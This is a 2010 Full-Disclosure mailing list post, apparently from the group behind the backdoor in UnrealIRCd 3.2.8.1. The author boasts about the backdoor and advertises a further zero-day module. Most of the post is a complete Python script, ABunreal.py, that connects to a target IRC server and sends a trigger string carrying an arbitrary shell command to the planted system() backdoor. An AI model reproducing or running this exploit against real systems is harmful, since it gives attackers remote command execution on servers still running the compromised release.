[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Fw: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Fw: [irc-security] UnrealIRCd 3.2.8.1 backdoored on official ftp and site
From: ac1db1tch3z@xxxxxxxxx
Date: Mon, 14 Jun 2010 01:53:29 +0100

It seems as if our backdoor was found so we figured we cant sell this in the 
ac1db1tch3z 
CANVAS pack (PhosphoricAc1d Exploit pack).

P.S. Since it took months and months for the community to find the system() 
exploit,
we still have a more complicated zerday unrealircd hack module. Please inquire
when our website is finished.

Brought to you by Ac1dB1tch3z: still using system() like it was 1992AD, 
and still owning everyone with it. Thanks.
------------------------------------------------------------------------

$ stat ABunreal.py 
 File: `ABunreal.py'
 Size: 830           Blocks: 8          IO Block: 4096   regular file
Device: fd02h/64770d    Inode: 16891994    Links: 1
Access: (0777/-rwxrwxrwx)  Uid: ( 1003/      ag)   Gid: ( 1010/      ag)
Access: 2010-04-05 14:26:14.000000000 -0400
Modify: 2009-11-10 00:04:33.000000000 -0500
Change: 2010-04-05 14:26:59.000000000 -0400

------------------------------------------------------------------------

#!/usr/bin/env python
# Ac1db1tch3z 09 

import sys
import socket
import struct

def injectcode(host, port, command):

        host1 = host
        port1 = int(port)
        cmd   = command

        print "!#@#@! Ac1db1tch3z is just Unreal #@!#%%\n"
        print "- Attacking %s on port %d"%(host1,port1)
        print "- sending command: %s"%cmd

        packet = "AB" +";"+ cmd + ";"+"\n"

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((host1, port1))
        except socket.error:
            print "No connection..."
            return 0
        s.sendall(packet)
        blah = s.recv(5000)
        print blah
        s.close()

if __name__ == "__main__":
        if len(sys.argv) == 1:
                print "Usage:", sys.argv[0], "<target host> <target port> 
<command>"
                print
                sys.exit(1)
        else:
                injectcode(sys.argv[1],sys.argv[2],sys.argv[3])

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] UnrealIRCd 3.2.8.1 backdoored on official ftp and site: ABunreal.py
Next by Date: Re: [Full-disclosure] Introducing TGP...
Previous by thread: Re: [Full-disclosure] UnrealIRCd 3.2.8.1 backdoored on official ftp and site: ABunreal.py
Next by thread: [Full-disclosure] AUTOREPLY Full-Disclosure Digest, Vol 64, Issue 34
Index(es):
- Date
- Thread